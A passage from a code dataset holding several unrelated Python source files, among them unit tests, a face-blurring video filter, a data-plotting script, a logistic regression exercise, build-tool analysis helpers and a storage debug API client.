1.13937713401e-09, 1.14189483372e-09,\n 1.14441253343e-09, 1.14693023313e-09, 1.14944793284e-09,\n 1.15196563254e-09, 1.15448333225e-09]) \n self.assertTrue(all(_lambda_expected[0:5] == _lambda_handler.lambda_array[0:5]))\n\n def test_load_bad_file_name(self):\n \"\"\"Assert in LambdaWavelength - file name is provided but does not exist\"\"\"\n _lambda_filename = os.path.join(self.data_path, 'i_do_not_exist.txt')\n self.assertRaises(IOError, LambdaWavelength, _lambda_filename)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/neutronbraggedge/experiment_handler/lambda_test.py","file_name":"lambda_test.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87940597","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2007, Timothy W. Cook and Contributors. All rights reserved.\n# Redistribution and use are governed by the MPL license.\n#\n# Use and/or redistribution of this file assumes you have read and accepted the\n# terms of the license.\n##############################################################################\n\nu\"\"\"\nFrom the Extract Information Model\n\"\"\"\n__author__ = u'Timothy Cook '\n__docformat__ = u'plaintext'\n__contributors__ = u'Eduardo César '\n\nimport grok\nfrom interfaces import *\n\n\n\nclass AddressedMessage(object):\n u\"\"\"\n The concept of a message addressed to nominated recipients.\n \"\"\"\n\n grok.implements(IAddressedMessage)\n\n def __init__(self, sender, senderReference, addresses, urgency, message):\n self.sender = sender\n self.senderReference = senderReference\n self.addresses = addresses\n self.urgency = urgency\n self.message = message\n\n\nclass Message(object):\n u\"\"\"\n A \"message\" is an authored, possibly signed, piece of content intended for\n one or more recipients. Since the recipient may or may not be known\n directly, recipients are specified in the ADDRESSED_MESSAGE class.\n \"\"\"\n\n grok.implements(IMessage)\n\n def __init__(self, audit, author, content, sig):\n self.audit = audit\n self.author = author\n self.content = content\n self.signature = sig\n\n\n","sub_path":"src/oship.openehr.rm/src/oship/openehr/rm/extract/message/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"270443137","text":"import random\nfrom uuid import UUID\n\nfrom apps.user.models import UserProfile\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers, status\nfrom rest_framework.response import Response\n\n\ndef mark_deleted(self):\n obj = self.get_object()\n\n obj.is_active = False\n try:\n obj.save()\n except ObjectDoesNotExist:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\ndef is_uuid(data):\n try:\n UUID(data, version=4)\n except ValueError:\n return False\n\n return True\n\n\ndef get_user_profile(request):\n user = None\n if request and hasattr(request, 'user'):\n user = UserProfile.get_profile_by_user(request.user)\n if not user:\n raise serializers.ValidationError(\"User doesn't exists\")\n return user\n\n\ndef yes_or_no():\n return bool(random.getrandbits(1))\n","sub_path":"tiberium/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"376512080","text":"'''\nThis script contains the codes that we recently developed, and is used to compile a Cython code.\n\nSteps:\n1. Copy this file to a new .pyx file.\n2. Compile the code by running python3 setup.py build_ext --inplace.\n3. Then run test_cython.py.\n\n'''\nimport torch\nimport os\nfrom itertools import product\nimport numpy as np\nimport face_recognition\nimport cv2\nimport matplotlib.patches as patches\nfrom IPython.display import clear_output\nfrom matplotlib.pyplot import imshow\nimport matplotlib.pylab as plt\nfrom PIL import Image, ImageDraw\nimport imageio\nfrom itertools import product\nfrom facenet_pytorch import MTCNN, InceptionResnetV1\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nimport mmcv\nimport numpy as np\nimport pandas as pd\nimport os\nfrom time import time\nfrom array_mp4_conversion import array_to_mp4, mp4_to_array\nfrom numba import jit, prange\nfrom collections import defaultdict\n# cimport numpy as np\n# ctypedef np.uint8_t D_TYPE\n\npath = os.getcwd()\n\nclass video_transformer_base:\n '''\n This is the base of video_transformer, containing basic information about the video.\n '''\n def __init__(self,\n path, \n save_path, \n file_name, \n device='cpu',\n display=False):\n \n self.video_path = os.path.join(path, \"data\", file_name)\n self.video_array, self.fps = mp4_to_array(self.video_path)\n self.display = display\n self.save_path = save_path\n self.file_name = file_name\n self.num_frames = 0\n if device == 'cpu':\n self.device = 'cpu'\n else:\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n \n def main_transformation(self, \n face_detection_model, \n filter_effect):\n '''\n For each frame, do:\n 1. detect the face;\n 2. apply the filter;\n 3. save the processed frame.\n ''' \n video_capture = cv2.VideoCapture(self.video_path)\n frame_count = 0\n output_frames = []\n while video_capture.isOpened(): \n # Grab a single frame of video\n ret, frame = video_capture.read()\n # try:\n # frame = torch.from_numpy(frame).to(self.device)\n # except:\n # print(ret)\n\n # Bail out when the video file ends\n if not ret:\n video_capture.release()\n break\n \n frame_count += 1\n # print(frame_count)\n # print(type(frame))\n # detect faces\n if face_detection_model != \"mtcnn\":\n face_locations = self.face_detection(frame, \n model=face_detection_model)\n else:\n face_locations = self.face_detection_mtcnn(frame)\n # print(f\"{len(face_locations)} face(s) detected at frame {frame_count}.\")\n\n # add effect\n after_effect_frame = filter_effect(frame, face_locations)\n\n # print(frame_count)\n if self.display and frame_count % 2 == 0:\n # If faces were found, we will mark it on frame with blue dots\n for face_location in face_locations:\n top, right, bottom, left = face_location\n cv2.rectangle(after_effect_frame,(left, top), (right, bottom), (0, 0, 255), 2)\n plt.imshow(after_effect_frame)\n plt.show()\n clear_output(wait=True)\n # im = Image.fromarray(after_effect_frame)\n # im.save(os.path.join(self.save_path, f\"{self.file_name}_prcs_{frame_count}.png\"))\n output_frames.append(after_effect_frame)\n self.num_frames = frame_count\n self.des_arr = np.array(output_frames)\n\n def face_detection(self, frame):\n '''\n Face detection with package face_recognition.\n Models includes: svm, knn, cnn.\n Currently fixed as model='svm' because model ='cnn' is slow.\n '''\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n rgb_frame = frame[:, :, ::-1]\n face_locations = face_recognition.face_locations(rgb_frame, model='svm')\n # print(f\"{len(face_locations)} face(s) detected.\")\n \n return face_locations\n def face_detection_mtcnn(self, frame):\n '''\n Face detection with package facenet_pytorch.\n MTCNN implemented in Pytorch, so also support CUDA.\n ''' \n\n mtcnn = MTCNN(keep_all=True, device=self.device)\n boxes, _ = mtcnn.detect(frame)\n \n if boxes is None:\n boxes = []\n \n boxes = np.array([[box[1], box[2], box[3], box[0]] for box in boxes]).astype(np.int)\n # print(f\"{len(boxes)} face(s) detected.\")\n return boxes\n def oil_effect(self, frame):\n pass\n \n def negative_effect(self, frame, locations):\n des_img = np.copy(frame)\n try:\n for location in locations:\n x_, y_, w_, h_ = location\n t_ = int(y_)\n r_ = int(x_+w_)\n b_ = int(y_+h_)\n l_ = int(x_)\n\n des_img[t_:b_,l_:r_] = 255 - frame[t_:b_,l_:r_]\n except:\n pass\n \n return des_img\n\n def mean_blur(self, frame, locations, radius=5):\n '''\n Apply simple mosaic effect to specified regions. \n '''\n k = 1 / (radius*2+1)**2\n des_img = np.copy(frame)\n height, width, _ = des_img.shape\n # try:\n for location in locations:\n top, right, bottom, left = location\n t_ = max(top+radius,0)\n b_ = min(bottom-radius, height)\n l_ = max(left+radius,0)\n r_ = min(right-radius, width)\n if t_ >= b_ or l_ >= r_:\n continue\n\n for i, j in product(range(t_, b_), range(l_, r_)):\n kernel = frame[i-radius:i+radius+1, j-radius:j+radius+1, :]\n sumed = np.sum(kernel, axis = (0,1)) * k\n des_img[i, j] = sumed.astype(np.uint8)\n # except:\n # pass\n \n return des_img \n \n # construct transformed gif\n def output(self):\n images = []\n frames_count = list(range(1,self.num_frames))\n \n for i in frames_count:\n try:\n images.append(imageio.imread(\n os.path.join(self.save_path, f\"{self.file_name}_prcs_{i}.png\")))\n except:\n pass\n imageio.mimsave(os.path.join(self.save_path, f\"{self.file_name}_prcs.gif\"), images)\n \n def write_to_video(self, output_filename):\n '''\n Write out the video with filter to mp4.\n '''\n array_to_mp4(output_filename, self.des_arr, self.fps)\n\nclass video_transformer_parallel(video_transformer_base):\n '''\n This version views the video as an array for easier parallelization.\n '''\n def __init__(self, path, save_path, file_name, device='cpu',display=False):\n video_transformer_base.__init__(self, path, save_path, file_name, device, display)\n \n self.locations = None\n self.des_arr = None\n\n torch.from_numpy(self.video_array).to(self.device)\n \n #@jit(nopython=False, fastmath=True)\n def mean_blur(self, image, des_img, locations, radius):\n '''\n mean_blur function with a source and destination image, the logic remains the same.\n '''\n # radius has to be even\n if len(locations) == 0:\n return\n k = 1 / (radius*2+1)**2\n height, width, _ = des_img.shape\n for location in locations:\n top, right, bottom, left = location\n t_ = max(top+radius,0)\n b_ = min(bottom-radius, height)\n l_ = max(left+radius,0)\n r_ = min(right-radius, width)\n if t_ >= b_ or l_ >= r_:\n continue\n for i in range(t_, b_):\n for j in range(l_, r_):\n kernel = image[i-radius:i+radius+1, j-radius:j+radius+1, :]\n sumed = np.sum(kernel, axis= 0, dtype=np.uint32)\n sumed = np.sum(sumed, axis=0)\n des_img[i, j, :] = (sumed * k).astype(np.uint8)\n #@jit(nopython=False, parallel=True)\n def get_face_locations(self, face_detection_model):\n '''\n get face_locations on entire video as an array.\n '''\n des_arr = torch.from_numpy(self.video_array.copy()).to(self.device)\n \n if face_detection_model != 'mtcnn':\n locations = list(map(self.face_detection, des_arr))\n else:\n locations = list(map(self.face_detection_mtcnn, des_arr)) \n\n return locations\n #@jit(nopython=False, parallel=True)\n def filter_on_video(self, filter_func, face_detection_model = 'mtcnn', radius = 15):\n '''\n Produce filter on the video.\n '''\n self.des_arr = self.video_array.copy()\n frame_size = self.video_array.shape[0]\n self.locations = self.get_face_locations(face_detection_model)\n for i in prange(frame_size):\n filter_func(self.video_array[i], self.des_arr[i], self.locations[i], radius)\n\n ","sub_path":"video_transformer_test_cython.py","file_name":"video_transformer_test_cython.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363438428","text":"import os, sys\n#sys.argv.append('-b') # run in batch mode so plot windows arent created\nimport numpy as np\nimport pandas as pd\nimport strip_parser\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport glob\nimport argparse\n\nparser = argparse.ArgumentParser(description = 'Produce plots and give averages of strip measurement data')\nparser.add_argument('-i', '--input', type=str, default='strips', help='Name of input file. Can take single file, folder, or regular expressions.')\nparser.add_argument('-o', '--output', type=str, default='plots', help='Name of directory where plots will be saved.')\nparser.add_argument('-a', '--average', type=str, help='Specify excel filename to save averages to file. If no option given average values will not be saved.')\nparser.add_argument('-d', '--drop', type=str, default='', help='Comma separated list of substrings. Measurements from datafile which contain the substrings will be dropped from plotting and averaging.')\nargs = parser.parse_args()\n\n\noutDir = args.output\ninStr = args.input\n\nto_drop = ['Time', '_0', '_1', '_2', '_3', '_Mean', '_V']\nif args.drop:\n to_drop += args.drop.split(',')\nprint('Will drop measurements which contain the following substrings:', to_drop)\n\n\ndef plotter(files):\n\n # Fill a dictionary with the measurement dataframes and other useful info\n # Sensor name is used as the key for each set of measurements\n data = {}\n meas_all = []\n for i, file in enumerate(files):\n sensor, _, _, temp_df = strip_parser.parseFile(file, to_drop, True)\n data[sensor] = {}\n data[sensor]['num'] = i # Use to keep colors consistent when plotting\n data[sensor]['data'] = temp_df.copy(deep=True)\n data[sensor]['measurements'] = list(data[sensor]['data'].columns)\n meas_all += data[sensor]['measurements']\n del temp_df\n \n print('\\n','Found measurements for the following sensors:\\n', data.keys(), '\\n')\n # Find all measurements taken, to know what to plot\n meas_all = list(set(meas_all))\n meas_all.remove('Strip')\n print('Will produce plots for the following measurements:\\n', meas_all)\n\n if not os.path.isdir(outDir):\n os.mkdir(outDir)\n\n # Writing script in a way, where we dont need each sensor to have the exact same measurements for it to run\n sensors = list(data.keys())\n sensors.sort(key = lambda x: x.split('_')[1])\n sensors.sort(key = lambda x: x.split('_')[-1])\n plt_style = '-,'\n for meas in meas_all:\n plt.figure(figsize=(10,6))\n to_plot = [sensor for sensor in sensors if meas in data[sensor]['measurements']]\n for sensor in to_plot:\n #plt.plot(data[sensor]['data']['Strip'], data[sensor]['data'][meas], color=plt.cm.RdYlBu(2*data[sensor]['num']), label=sensor)\n if 'MAINR' in sensor:\n plt_style = '-+'\n plt.plot(data[sensor]['data']['Strip'], np.abs(data[sensor]['data'][meas]), plt_style, label=sensor)\n plt_style = '-,'\n\n plt.xlabel('Strip')\n plt.ylabel(getYUnit(meas))\n plt.title(meas)\n plt.legend(loc='best')\n\n plt.savefig('%s/%s.png' % (outDir, meas))\n\n\n print('Now producing average measurement for each sensor')\n\n # Start with a dataframe for all the measurements and keys filled with 0\n avg = pd.DataFrame(np.zeros((len(data.keys()), len(meas_all)), dtype=np.float32), index=list(data.keys()), columns=meas_all)\n for sensor in sensors:\n for meas in data[sensor]['measurements']:\n avg.loc[sensor,meas] = np.mean(data[sensor]['data'][meas])\n\n print(avg)\n\n if args.average:\n avg_out = args.average.split('.')[0]\n avg_out += '.xlsx'\n avg.to_excel(avg_out)\n #outf = open(avg_out, 'w')\n #outf.write(avg.to_csv(), sep='\\t')\n #outf.close()\n\ndef getYUnit(meas):\n if 'Istrip' in meas or 'Current' in meas or 'Pin' in meas:\n return 'Current (A)'\n elif 'Resistance' in meas:\n return 'Resistance ($\\Omega$)'\n elif 'Cap' in meas or ('Inter' in meas and 'C' in meas):\n return 'Capacitance (F)'\n else:\n return meas\n\ndef main():\n global inStr\n if os.path.isdir(inStr):\n inStr += \"/*\"\n files = glob.glob(inStr)\n print('Found the following files:', files)\n if files == []:\n print(\"No files found for input '%s'. Please double check and try again.\" % inStr)\n sys.exit(1)\n plotter(files)\n return 0\n\nif __name__ == '__main__':\n main()\n","sub_path":"multi_sensor_plotter.py","file_name":"multi_sensor_plotter.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"62635155","text":"from enum import Enum\n\nclass Instruction(Enum):\n UP = 1\n RIGHT = 2\n DOWN = 3\n LEFT = 4\n OK = 5\n\n def decode(instruction):\n instruction = instruction.value\n arrInst = [\n (-1, 0),\n (0, 1),\n (1, 0),\n (0, -1),\n ]\n return arrInst[instruction - 1]\n\nclass Remote:\n alphabet = 'abcdefghijklmnoprstuvwxyz'\n\n def __init__(self, width):\n self.width = width\n self.reset()\n\n def reset(self):\n self.position = (0, 0)\n\n def getInstructions(self, word):\n instructions = list()\n for ch in word:\n desiredIdx = Remote.alphabet.index(ch)\n if desiredIdx == -1:\n raise Exception(f'Incorrect character {ch}!')\n row, col = (desiredIdx // self.width, desiredIdx % self.width)\n currRow, currCol = (self.position)\n delta = currRow - row\n action = Instruction.UP if delta > 0 else Instruction.DOWN \n instructions += [action] * abs(delta)\n delta = currCol - col\n action = Instruction.LEFT if delta > 0 else Instruction.RIGHT\n instructions += [action] * abs(delta)\n instructions.append(Instruction.OK)\n self.position = (row, col)\n return instructions\n \n def execute(self, instructions):\n for i in instructions:\n row, col = self.position\n if i == Instruction.OK:\n print(Remote.alphabet[row * self.width + col])\n else:\n # print(i)\n decoded = Instruction.decode(i)\n row += decoded[0]\n col += decoded[1]\n if (row * self.width + col > len(Remote.alphabet)\n or row < 0 or row >= self.width or col < 0 or col >= self.width):\n print(row, col)\n raise Exception('Out of boundaries')\n self.position = (row, col)\n\nr = Remote(5)\ni = r.getInstructions('ivan')\nr.reset()\nr.execute(i)","sub_path":"questions/printRemote.py","file_name":"printRemote.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"293888617","text":"import aioredis\nfrom starlette.applications import Starlette\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\nfrom starlette.routing import Route\n\nfrom starlette_session import SessionMiddleware\nfrom starlette_session.backends import BackendType\n\n\nasync def setup_session(request: Request) -> JSONResponse:\n request.session.update({\"data\": \"session_data\"})\n return JSONResponse({\"session\": request.session})\n\n\nasync def clear_session(request: Request):\n request.session.clear()\n return JSONResponse({\"session\": request.session})\n\n\ndef view_session(request: Request) -> JSONResponse:\n return JSONResponse({\"session\": request.session})\n\n\nroutes = [\n Route(\"/setup_session\", endpoint=setup_session),\n Route(\"/clear_session\", endpoint=clear_session),\n Route(\"/view_session\", endpoint=view_session),\n]\n\n\napp = Starlette(debug=True, routes=routes)\n\n\n@app.on_event(\"startup\")\nasync def on_startup():\n redis_client = await aioredis.create_redis_pool((\"localhost\", 6379))\n app.add_middleware(\n SessionMiddleware,\n secret_key=\"secret\",\n cookie_name=\"cookie22\",\n backend_type=BackendType.aioRedis,\n backend_client=redis_client,\n )\n","sub_path":"examples/aioredis_example.py","file_name":"aioredis_example.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255656971","text":"'''\r\nCreated on 26 Oct 2016\r\n\r\n@author: Nicholas.R_adm\r\n'''\r\nfrom scipy.optimize._minimize import minimize\r\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\r\n\r\n''' http://www.johnwittenauer.net/machine-learning-exercises-in-python-part-1/ '''\r\n''' http://aimotion.blogspot.co.uk/2011/11/machine-learning-with-python-logistic.html '''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n\r\ndef sigmoid(x, theta):\r\n sig = 1/ ( 1+ np.exp(-x.dot(theta.T)))\r\n return sig\r\n\r\ndef logisticCost(x, m, X, Y, reg = False, lamb = 1):\r\n theta = np.matrix(x)\r\n hyp = sigmoid(X, theta)\r\n\r\n if reg:\r\n ## Must not regularize theta0. lambda in essence tells the minimization that we want to fit the data well, but also keep the size of the \r\n #parameters small, thus if we have to minimize including the sum of the parameters, this ensures the size of the parameters is minimized as well\r\n J = 1/m * ((-np.multiply(np.matrix(Y).T,np.log(hyp))) - (np.multiply(( 1 - np.matrix(Y).T), np.log(1-hyp)))).sum(axis = 0) + lamb/(2*m) * np.power(theta[:,1:],2).sum()\r\n else:\r\n J = 1/m * ((-np.multiply(np.matrix(Y).T,np.log(hyp))) - (np.multiply(( 1 - np.matrix(Y).T), np.log(1-hyp)))).sum(axis = 0)\r\n return J\r\n\r\n\r\n\r\ndata1 = pd.read_csv('C:\\\\Users\\\\Nicholas.R_adm\\\\Documents\\\\workspace\\\\Python\\\\Home Scripts\\\\ML exercises\\\\ex2\\\\ex2Data1.txt',header=None )\r\ndata1.columns = ['exam1','exam2','yesNo']\r\n\r\nfig = plt.figure()\r\nplt.scatter(data1.exam1[data1.yesNo == 1 ], data1.exam2[data1.yesNo == 1 ], marker = '+', color = 'black', label = 'admitted')\r\nplt.scatter(data1.exam1[data1.yesNo == 0 ], data1.exam2[data1.yesNo == 0 ], marker = 'o', color = 'yellow', label = 'not admitted')\r\nlegend = plt.legend(loc = 'upper right')\r\n\r\n## Hypothesis for logistic regression uses sigmoid funtion, so hypothesis is either 1 or zero for binary logistic regression\r\n\r\n\r\nX = np.concatenate((np.matrix(np.ones(data1.shape[0])).T,data1.iloc[:,:2].as_matrix()),axis =1)\r\nm= X.shape[0]\r\nY = np.array(data1.iloc[:,2])\r\ntheta = np.matrix(np.zeros(X.shape[1]))\r\nsigVals = sigmoid(X, theta)\r\n\r\n## now try to find minimum with a built in minimizer\r\ntheta = minimize(fun = logisticCost, x0 = np.asarray(theta)[0], args = (m,X,Y), method = 'SLSQP' )\r\n\r\n## thus we use the sigmoid function using a particular training set and the calculated thetas to get a \r\n# 1 or a zero i.e. a yes or a no\r\n\r\n## plot the decision boundary, y = 1: theta0 + theta1X1 + theta2X2 >= 0, => X2 = (-theta0 - theta1X1)/ theta2\r\nplt.plot(np.array(data1.exam1), (np.array(X[:,:2].dot(-theta.x[:2]))[0])/theta.x[2])\r\n\r\n\r\n#### Regularized logistic regression\r\n\r\ndata2 = pd.read_csv('C:\\\\Users\\\\Nicholas.R_adm\\\\Documents\\\\workspace\\\\Python\\\\Home Scripts\\\\ML exercises\\\\ex2\\\\ex2Data2.txt',header=None )\r\ndata2.columns = ['test1','test2','yesNo']\r\n\r\nfig = plt.figure()\r\nplt.scatter(data2.test1[data2.yesNo == 1 ], data2.test2[data2.yesNo == 1 ], marker = '+', color = 'black', label = 'admitted')\r\nplt.scatter(data2.test1[data2.yesNo == 0 ], data2.test2[data2.yesNo == 0 ], marker = 'o', color = 'yellow', label = 'not admitted')\r\nlegend = plt.legend(loc = 'upper right')\r\n\r\nX = np.concatenate((np.matrix(np.ones(data2.shape[0])).T,data2.iloc[:,:2].as_matrix()),axis =1)\r\nm= X.shape[0]\r\nY = np.array(data2.iloc[:,2])\r\n# clearly there is no linear boundary, so straightforward logistic regression will not work as it is only for linear.\r\n# therefore use feature mapping. Aim is to create more features from each data point. We will map the two test features onto eachother as all polynomial combinations \r\n# up to the sixth power, thus converting the linear straightline rgression to polynomial (more complicated decision boundary). \r\n# Thus we can transform the original two feature tests into a 28 dimensional vector, and thus a more expressive classifier.\r\n\r\n#feature map: 1, x1, x2,x1x2, x1^2, x1^2x2, x1^2x2^2, x1^3, x1^3x2^3\r\ndef mapFeature(X1, X2, nPoly=1):\r\n xMap = []\r\n for i in range(1,nPoly+1):\r\n for j in range(0,i+1):\r\n xMap.append(np.multiply(np.power(X1,i-j),np.power(X2,j)))\r\n return xMap\r\n\r\nxMap = mapFeature(X[:,1],X[:,2], nPoly = 6) \r\nxMap = np.concatenate([np.matrix(np.ones(X.shape[0])).T,np.concatenate(xMap, axis = 1)],axis = 1) \r\ntheta = np.matrix(np.zeros(xMap.shape[1]))\r\ntheta = minimize(fun = logisticCost, x0 = np.asarray(theta)[0], args = (m,xMap,Y,True,1), method = 'SLSQP' ,options = {'maxiter':500})['x']\r\n\r\n## to visualize, we must calculate the classifiers predictions on an grid, then draw a contour plot of where the prediction changes from y = 0 to y = 1.\r\n\r\nu = np.linspace(-1,1.5,50)\r\nv = np.linspace(-1,1.5,50)\r\n\r\nz = np.zeros([len(u), len(v)])\r\n\r\nfor i in range(len(u)):\r\n for j in range(len(v)):\r\n ## Need to map feature the grid as theta were calculated with mapped features\r\n uMap = np.matrix(mapFeature(u[i],v[j], nPoly = 6))\r\n z[i,j] = np.concatenate([np.matrix(1),uMap],axis = 1) * np.matrix(theta).T\r\n \r\nU,V = np.meshgrid(u,v)\r\ncp = plt.contour(U, V, z.T)\r\n\r\nfigSurf = plt.figure()\r\nax = figSurf.add_subplot(111,projection = '3d')\r\nax.plot_surface(X = U, Y= V,Z = z.T)\r\n\r\n#\" A contour line or isoline of a function of two variables is a curve along which the function \r\n# has a constant value.\"\r\n\r\n## Thus the contour plot shows where the result from the sigmoid will change i.e either side of the constant function\r\n\r\n\r\n## Playing with lambda shows that a smaller lambda will tighten the boundaries, but may lead to overfitting\r\nfig = plt.figure()\r\nplt.scatter(data2.test1[data2.yesNo == 1 ], data2.test2[data2.yesNo == 1 ], marker = '+', color = 'black', label = 'admitted')\r\nplt.scatter(data2.test1[data2.yesNo == 0 ], data2.test2[data2.yesNo == 0 ], marker = 'o', color = 'yellow', label = 'not admitted')\r\nlegend = plt.legend(loc = 'upper right')\r\n\r\nz = np.zeros([len(u), len(v)])\r\n\r\nxMap = mapFeature(X[:,1],X[:,2], nPoly = 6) \r\nxMap = np.concatenate([np.matrix(np.ones(X.shape[0])).T,np.concatenate(xMap, axis = 1)],axis = 1) \r\ntheta = np.matrix(np.zeros(xMap.shape[1]))\r\ntheta = minimize(fun = logisticCost, x0 = np.asarray(theta)[0], args = (m,xMap,Y,True,0.000001), method = 'SLSQP' ,options = {'maxiter':500})['x']\r\n\r\nfor i in range(len(u)):\r\n for j in range(len(v)):\r\n ## Need to map feature the grid as theta were calculated with mapped features\r\n uMap = np.matrix(mapFeature(u[i],v[j], nPoly = 6))\r\n z[i,j] = np.concatenate([np.matrix(1),uMap],axis = 1) * np.matrix(theta).T\r\n \r\nU,V = np.meshgrid(u,v)\r\ncp = plt.contour(U, V, z.T)\r\n\r\n","sub_path":"ML exercises/ex2/Ex2_logistic_regression.py","file_name":"Ex2_logistic_regression.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"217758570","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\nimport os\nimport shutil\n\nfrom pants.util.contextutil import temporary_dir\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass AnalysisTools(object):\n \"\"\"Analysis manipulation methods required by JvmCompile.\"\"\"\n _PANTS_BUILDROOT_PLACEHOLDER = b'/_PANTS_BUILDROOT_PLACEHOLDER'\n _PANTS_WORKDIR_PLACEHOLDER = b'/_PANTS_WORKDIR_PLACEHOLDER'\n\n def __init__(self, java_home, parser, analysis_cls, pants_buildroot, pants_workdir):\n self.parser = parser\n self._java_home = java_home\n self._pants_buildroot = pants_buildroot.encode('utf-8')\n self._pants_workdir = pants_workdir.encode('utf-8')\n self._analysis_cls = analysis_cls\n self.rebase_mappings = {self._pants_workdir: self._PANTS_WORKDIR_PLACEHOLDER,\n self._pants_buildroot: self._PANTS_BUILDROOT_PLACEHOLDER}\n self.localize_mappings = {v:k for k, v in self.rebase_mappings.items()}\n\n def relativize(self, src_analysis, relativized_analysis):\n if not os.path.isfile(src_analysis):\n logger.debug(\"AnalysisTools: src_analysis file {} does not exist, skipping relativize\".format(src_analysis))\n return\n with temporary_dir() as tmp_analysis_dir:\n tmp_analysis_file = os.path.join(tmp_analysis_dir, 'analysis.relativized')\n\n # NOTE: We can't port references to deps on the Java home. This is because different JVM\n # implementations on different systems have different structures, and there's not\n # necessarily a 1-1 mapping between Java jars on different systems. Instead we simply\n # drop those references from the analysis file.\n #\n # In practice the JVM changes rarely, and it should be fine to require a full rebuild\n # in those rare cases.\n # Work on a tmpfile, for safety.\n self.parser.rebase_from_path(src_analysis, tmp_analysis_file, self.rebase_mappings, self._java_home)\n\n shutil.move(tmp_analysis_file, relativized_analysis)\n\n def localize(self, src_analysis, localized_analysis):\n if not os.path.isfile(src_analysis):\n logger.debug(\"AnalysisTools: src_analysis file {} does not exist, skipping localize\".format(src_analysis))\n return\n with temporary_dir() as tmp_analysis_dir:\n tmp_analysis_file = os.path.join(tmp_analysis_dir, 'analysis')\n\n # Work on a tmpfile, for safety.\n self.parser.rebase_from_path(src_analysis, tmp_analysis_file, self.localize_mappings)\n\n shutil.move(tmp_analysis_file, localized_analysis)\n","sub_path":"src/python/pants/backend/jvm/tasks/jvm_compile/analysis_tools.py","file_name":"analysis_tools.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"22445671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# Girder, large_image plugin framework and tests adapted from Kitware Inc.\n# source and documentation by the Imaging and Visualization Group, Advanced\n# Biomedical Computational Science, Frederick National Laboratory for Cancer\n# Research.\n#\n# Copyright Kitware Inc.\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\nimport os.path\nimport tempfile\n\nfrom tests import base\n\n\ndef setUpModule():\n base.enabledPlugins.append('larger_image')\n base.startServer()\n\n\ndef tearDownModule():\n base.stopServer()\n\n\nclass CreateTiffTest(base.TestCase):\n def testCreateTiff(self):\n in_path = os.path.join(os.path.dirname(__file__), 'test_files',\n 'grey10kx5kdeflate.tif')\n compression = 'none'\n quality = 90\n tile_size = 256\n out_path = os.path.join(tempfile.gettempdir(),\n 'grey10kx5kdeflate_tiled.tif')\n import girder.plugins.larger_image.create_tiff as create_tiff\n create_tiff.create_tiff(in_path, compression, quality, tile_size,\n out_path)\n","sub_path":"plugin_tests/create_tiff_test.py","file_name":"create_tiff_test.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"67924592","text":"# Copyright (c) 2013 Qumulo, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\nimport qumulo.lib.request as request\nfrom qumulo.lib.uri import UriBuilder\n\n@request.request\ndef start_rpc_flood(conninfo, credentials, remote, count):\n method = \"POST\"\n uri = str(UriBuilder(path=\"/v1/debug/flood/rpc\"))\n body = { 'id' : int(remote),\n 'count' : int(count) }\n return request.rest_request(conninfo, credentials, method, uri, body=body)\n\n@request.request\ndef get_flood_status(conninfo, credentials):\n method = \"GET\"\n uri = 